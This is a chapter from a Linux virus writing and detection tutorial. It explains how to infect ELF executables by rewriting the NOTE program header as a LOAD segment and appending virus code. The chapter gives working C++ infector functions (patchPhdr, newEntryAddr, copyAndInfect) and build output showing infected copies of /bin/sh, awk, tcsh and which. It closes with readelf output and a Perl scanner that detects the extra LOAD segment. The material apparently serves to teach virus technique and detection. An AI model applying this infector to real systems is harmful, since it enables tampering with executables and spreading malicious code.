If the code and the comments disagree, then both are probably wrong. | |
| Norm Schryer |
In One step closer to the edge we inserted code into the gap between code and data segment. This loophole is rather small. And even worse, it is not too hard to check whether it is occupied. I still have no cure for that. Read the trail of my wrath.
Well, just kidding. But mindless rage is a good excuse for actions that are doomed from the start. Of course my pestiferous piece of Perl will detect the result of this section ("has 3 LOAD segments"). But then even the untrained eye can spot the difference in the output of readelf. So why is this done at all?
Because the method is very simple to implement and imposes no size limit on the code.
Have a look at readelf's output on /bin/sh. The last program header is of type NOTE and has exactly 0x20 bytes. So what's in there?
Command.
#!/bin/sh
readelf -l /bin/sh \
| grep '^ *NOTE *' \
| while read Type Offset VirtAddr PhysAddr FileSiz MemSiz rest
do
ofs=$( echo "ibase=16; ${VirtAddr#0x} - 08048000" | bc )
size=$( echo "ibase=16; ${FileSiz#0x}" | bc )
od -Ax -j $ofs -N $size /bin/bash -c
done |
Output.
000108 004 \0 \0 \0 020 \0 \0 \0 001 \0 \0 \0 G N U \0 000118 \0 \0 \0 \0 002 \0 \0 \0 002 \0 \0 \0 005 \0 \0 \0 000128 |
It's the magic of the GNU. In this special case we can live without.
Overwrite program header of type of NOTE with a code segment definition (type LOAD).
Append virus code at end of file.
Having just 26 bytes, our unrealistic code is small enough to fit into the NOTE segment. But let's pretend this is a real example. I will reuse the framework from One step closer to the edge.
Double infection is again impossible by design. If there is no PT_NOTE this target is out of reach.
Source - patchPhdr.
bool Target::patchPhdr()
{
Elf32_Phdr* note = phdr + 5;
if (note->p_type != PT_NOTE)
return false;
note->p_type = PT_LOAD;
/* align up multiple of 16 */
note->p_offset = aligned_filesize;
note->p_vaddr =
note->p_paddr = newEntryAddr();
note->p_filesz =
note->p_memsz = INFECTION_SIZE;
note->p_flags = phdr[2].p_flags;
note->p_align = phdr[2].p_align;
return true;
} |
We can use any memory region not already occupied. Using one below the magic base of 0x8048000 avoids trouble. See INFECTION_SIZE for an explanation of % 0x1000.
Source - newEntryAddr.
unsigned Target::newEntryAddr()
{
return 0x08000000 + aligned_filesize % 0x1000;
} |
Source - copyAndInfect.
bool Target::copyAndInfect()
{
write(fd_dst, p.b, filesize); /* original target */
lseek(fd_dst, aligned_filesize, SEEK_SET);
unsigned code_size = writeInfection();
fprintf(stderr, "wrote %u bytes, ", code_size);
return true;
} |
Output - build.
Infecting copy of /bin/awk... wrote 25 bytes, Ok Infecting copy of /bin/tcsh... wrote 25 bytes, Ok Infecting copy of /usr/bin/which... wrote 25 bytes, Ok Infecting copy of /bin/sh... wrote 25 bytes, Ok |
Output - test.
ELF/home/alba/virus-writing-and-detection-HOWTO/tmp/additional_cs/three/sh_infected 2.05.8(1)-release /usr/bin/which ELF/usr/bin/which ELFtcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm ELFGNU Awk 3.1.0 Copyright (C) 1989, 1991-2001 Free Software Foundation. |
The usual output. On to readelf. Compare it with the original.
Output - readelf.
-rwxrwxr-x 1 alba alba 519994 Apr 10 00:04 tmp/additional_cs/three/sh_infected
Elf file type is EXEC (Executable file)
Entry point 0x8059380
There are 6 program headers, starting at offset 52
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
PHDR 0x000034 0x08048034 0x08048034 0x000c0 0x000c0 R E 0x4
INTERP 0x0000f4 0x080480f4 0x080480f4 0x00013 0x00013 R 0x1
[Requesting program interpreter: /lib/ld-linux.so.2]
LOAD 0x000000 0x08048000 0x08048000 0x79273 0x79273 R E 0x1000
LOAD 0x079280 0x080c2280 0x080c2280 0x057e0 0x09bd0 RW 0x1000
DYNAMIC 0x07e980 0x080c7980 0x080c7980 0x000e0 0x000e0 RW 0x4
LOAD 0x07ef20 0x08000f20 0x08000f20 0x01000 0x01000 R E 0x1000
Section to Segment mapping:
Segment Sections...
00
01 .interp
02 .interp .note.ABI-tag .hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.got .rel.bss .rel.plt .init .plt .text .fini .rodata
03 .data .eh_frame .ctors .dtors .got .dynamic .bss
04 .dynamic
05 |
File size grew 519994 - 519964 = 30 bytes. But even an unmodified entry point is pointless in this case. Anybody can notice LOAD instead of NOTE.
Command - scan.
#!/bin/sh echo '/bin/bash tmp/additional_cs/three/sh_infected' \ | src/check_dist/check_dist.pl |
Output - scan.
tmp/additional_cs/three/sh_infected virtaddr=0x8000f20 dist=0xfff394c0 tmp/additional_cs/three/sh_infected has 3 LOAD segments. 2 files; min_distance=0xfff394c0 max_distance=0x00100d |
Case closed. Guilty of failure.
| <<< Previous | Home | Next >>> |
| Remote shell trojan (RST) | Doing it in C |